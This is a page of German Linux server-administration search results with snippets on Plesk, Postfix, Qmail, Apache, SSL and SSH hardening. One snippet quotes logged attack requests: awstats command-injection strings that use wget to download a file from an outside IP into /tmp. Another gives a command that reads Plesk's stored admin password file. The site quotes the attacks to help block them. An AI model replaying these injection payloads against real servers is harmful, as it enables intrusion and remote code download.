Linux-Distributionen
Huschi als Linux-Admin
Volltextsuche
363 Suchergebnisse
Seite 6 von 25 Seiten
- Security & Firewalls:
Webmin absichernWebmin absichern Warum? Webmin ist neben der ssh-Shell eine hoch berechtigte Schnittstelle zum System. Um möglichst wenig Angriffspunkte zu haben sollte man mit ein paar kleinen Schritten - Admin- / ISP-Software » Plesk:
Zuviele Fehlversuche im Plesk-LoginProblem: Nach 3 fehlerhaften Eingaben block Plesk für länger Zeit im Login. Lösung: Auf der Konsole folgenden Befehl ausführen: mysql -uadmin -p`cat /etc/psa/.psa.shadow` psa -e "delete from lockout" - Clients:
Thunderbird bringt sofort: "Zeitüberschreitung der Verbindung mit dem Server..."Problem: Nach einem Systemwechsel auf einen AMD Athlon64 X2 mit Windows XP funktioniert der Mailversand und der Empfang mit Mozilla Thunderbird nur noch sporadisch. Meistens kommt - Web-Server:
suExec/suExec2 neu compilierenProblem: Z.B. bei einem Update von Apache wurde die suexec (suexec2) durch die von Apache mitgelieferte suexec (suexec2) ersetzt.Danach funktioniert kein CGI-Script mehr, weil die neue - Linux (allgemein):
Festplatte oder einzelnes Verzeichnis verschlüsselnProblem: Man möchte einen Teil der Festplatte verschlüssel. (Warum auch immer...) Lösung: Wir erstellen eine Image-Datei die per AES verschlüsselt wird: #Einhängen der Kernelmodule Crypt & AESmodprobe cryptoloopmodprobe aes#Image - Mail-Server » Qmail:
Qmail: Beim Mail-Versand dauert die Verbindung 30-60 SekundenProblem: Beim Versand mit Thunderbird (oder auch Outlook) dauert die Verbindung mit dem Mail-Server auch bei kleinen Emails sehr lange. Erläuterung: Die SMTP-Verbindung nimmt der Server über xinetd - Mail-Server:
ESMTP-Dialog (SMTP-Auth)ESMTP-Dialog Ein SMTP-Dialog wurde bereits vorgestellt. Heute erkläre ich einen ESMTP-Dialog mit verschiedenen Authentifizierungsmethoden. Wir sehen uns drei Auth-Methods an: PLAIN LOGIN CRAM-MD5 PLAIN Die Methode PLAIN wird von Netscape/Mozilla/Thunderbird bevorzugt. Dies - Security & Firewalls:
Hacking-Versuche unterbindenProblem: Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst): "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST - Mail-Server » Postfix:
Debian/Postfix: SMTP-Auth einrichtenEinleitung: Wir wollen auf einen Server mit Postfix und ohne ISP-Software schnell und unkompliziert mit SMTP-Auth einrichten um ein Open-Relay zu vermeiden. Installation: Für die vollständige Installation braucht - Web-Server:
SSL für eine Domain einrichtenFrage: Wie kann man einen VirtualHost auf SSL umstellen? Lösung: Einfach den vorhanden NameVirtualHost my.ip:443<VirtualHost my.ip:443> SSLEngine On - Datenbank-Server:
Confixx: MySQL-User bekommt alle Datenbanken angezeigtProblem: Ein in Confixx angelegter MySQL-User bekommt alle Datenbanken angezeigt. Nutzen kann er zwar nur seine eigenen, aber dennoch ist dieses Verhalten unerwünscht.Erklärung: Nach einem Update auf - Linux-Distributionen » Debian:
Debian: Java-VM installierenProblem: Da Debian grundsätzlich nur freie Software unterstützt, hat man entsprechend mit Hindernissen zu rechnen, sobald es um kommerzielle Software geht. Die Installation einer Java-VM ist so - Mail-Server » Postfix:
Postfix: fine tuningProblem: Für einen Einsatz als High-Traffic-Server braucht Postfix noch ein paar Änderungen um den Traffic-Aufwand wirklich beweltigen zu können.Dies sind aber keine Spielerei-Einstellungen. Sondern sollten wirklich - Security & Firewalls:
SSH-BruteForce-Attacken eindämmenProblem: In den Logfiles stehen ständig Misslungene Einbruchsversuche auf dem SSH-Port. Lösungen: a) SSH-Port verlegen: in sshd_config den Parameter Port oder ListenAddress setzen. b) Per PAM-Modul: pam_abl c) Per - Web-Server:
Apache-VirtualHost vollständig unter verschiedenen BenutzernProblem: Scripte werden (je nach Installation) unter anderen Benutzerrechten gestartet als z.B. der FTP-Benuzter. Z.B. PHP-Scripte als wwwrun. Lösung: Dies kann man entweder mit suExec oder suPHP